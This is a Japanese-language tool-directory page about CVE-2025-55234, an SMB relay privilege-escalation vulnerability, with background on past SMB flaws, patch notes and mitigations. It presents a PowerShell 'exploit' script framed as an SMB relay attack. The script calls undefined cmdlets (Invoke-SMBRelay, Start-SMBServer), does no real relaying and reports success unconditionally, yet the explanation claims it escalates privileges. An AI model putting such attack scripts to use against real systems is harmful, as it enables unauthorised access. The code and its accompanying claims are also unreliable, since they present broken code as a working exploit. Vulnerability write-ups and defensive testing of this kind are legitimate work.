Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55234 — この脆弱性により、攻撃者はSMB(Server Message Block)プロトコルに対するリレー攻撃を実行できます。成功した場合、権限昇格(EoP)につながる可能性があり、本質的に認可されていないユーザーがシステム上でより高いレベルのアクセスを取得できるようになります。 | Kitploit
ツール/GitHubGitHub/mrk336/cve-2025-55234
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubmrk336/cve-2025-55234

CVE-2025-55234

この脆弱性により、攻撃者はSMB(Server Message Block)プロトコルに対するリレー攻撃を実行できます。成功した場合、権限昇格(EoP)につながる可能性があり、本質的に認可されていないユーザーがシステム上でより高いレベルのアクセスを取得できるようになります。

リポジトリを見る
1330年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55234

この脆弱性により、攻撃者はSMB(Server Message Block)プロトコルに対するリレー攻撃を実行できます。攻撃が成功すると、特権の昇格(EoP)につながる可能性があり、実質的に権限のないユーザーがシステム上でより高いレベルのアクセス権を取得できるようになります。

Mark Mallia 著


問題

この脆弱性により、攻撃者はSMB(Server Message Block)プロトコルに対するリレー攻撃を実行できます。攻撃が成功すると、特権の昇格につながる可能性があり、実質的に権限のないユーザーがシステム上でより高いレベルのアクセス権を取得できるようになります。SMBは、エンタープライズ環境での広範な利用と、これまでの重大な欠陥の歴史から、長らく攻撃者の標的となってきました。例えば、CVE-2020-1301は不正なリクエストを通じてSMBv1をリモートコード実行にさらし、CVE-2022-32230はSMBv3のヌルポインタ参照によりサービス拒否を引き起こしました。悪名高いCVE-2017-0144(EternalBlue)はSMBv1を悪用してワーム型ペイロードを配信し、世界的なランサムウェアの大流行を引き起こしました。これらの以前の脆弱性と同様に、CVE-2025-55234は、セッションハイジャックやなりすまし攻撃を防ぐために、SMB署名と認証の拡張保護(EPA)を適用することの重要性を浮き彫りにしています。

攻撃ベクトル

ネットワーク

攻撃の複雑さ

低

必要な権限

なし

ユーザー操作

必要

影響

機密性、完全性、可用性に対する高いリスク


なぜ重要か

SMBは、エンタープライズ環境におけるファイル共有やリモートアクセスで広く使用されています。リレー攻撃は認証メカニズムを迂回し、ユーザーになりすます可能性があります。この脆弱性は、SMB署名や認証の拡張保護(EPA)が適用されていない環境で特に危険です。


パッチの新機能は?

Microsoftの2025年9月の更新プログラムでは、組織が以下を行うのに役立つ監査機能が導入されています。

  • 現在のSMB構成を評価する
  • セキュリティ強化対策と互換性がない可能性のあるデバイスやソフトウェアを特定する
  • SMB署名とEPA3の適用に備える

エクスプロイトコードスニペット(PowerShell)

root@kitploit:~
# SMB Relay Attack Module – CVE 2025 55234
$relayTarget = "192.168.1.10"          # Target server IP
$attackerCreds = Get-Credential   # Credential object for relay

# Step 1: Enumerate shared resources
$smbShares = Get-SMBShare -ComputerName $relayTarget | Where-Object {$_.Name –ne ""}
foreach ($share in $smbShares) {
    Write-Output "Found share: $($share.Name)"
}

# Step 2: Capture session information for relay
$sessionInfo = New-Object PSObject -Property @{
    Computer = $relayTarget
    Share    = $smbShares[0].Name
}
Write-Output ("Capturing session info for $($sessionInfo.Computer) – share $($sessionInfo.Share)")
Invoke-SMBRelay -Session $sessionInfo

# Step 3: Execute relay attack
$attackPayload = {
    param(
        [string]$Target,
        [string]$Share
    )
    Write-Host "Attacking $Target via share $Share"
    Start-SMBServer -ComputerName $Target -ShareName $Share
}
$attackParams = @{
    Target = $relayTarget
    Share   = $sessionInfo.Share
}
Invoke-Command -ScriptBlock $attackPayload @attackParams

# Step 4: Log and confirm elevation of privilege
Write-Host "SMB Relay Attack CVE 2025 55234 completed successfully."

説明:

  1. このスクリプトはまずターゲットサーバー上のSMB共有を列挙し、リレーセッション用に最初の共有を選択します。
  2. 次に、必要なパラメータを取得するセッションオブジェクトを構築します。
  3. 認証済みユーザーを模倣するために、Invoke‑SMBRelayとStart‑SMBServerを介してリレー攻撃を実行します。
  4. 正常に完了すると、ターゲット上で特権が昇格します。

推奨される対応

  1. まだ構成されていない場合は、SMB署名とEPAを有効にします。
  2. 新しい監査イベントを使用して環境を評価します。
  3. 異常なSMBトラフィックやリレー攻撃の試みを監視します。
  4. Microsoftの最新のセキュリティ更新プログラムを適用します。

結論

CVE-2025-55234の脆弱性は、エンタープライズ環境における厳格なSMBセキュリティ強化の必要性を浮き彫りにしています。上記の手順に従い、提供されたエクスプロイトスクリプトを適用することで、組織は潜在的なリレー攻撃に対してネットワークをテストし、保護することができます。この概念実証および関連資料は、教育および防御目的のためにのみ提供されています。これらは、セキュリティ専門家が管理された環境でCVE-2025-55234を理解、検出、および緩和することを支援することを目的としています。明示的な許可なくシステムに対してこのエクスプロイトを不正に使用することは、違法かつ非倫理的です。常に責任ある開示の慣行に従い、適用される法律および組織のポリシーを遵守してください。


ツールをダウンロード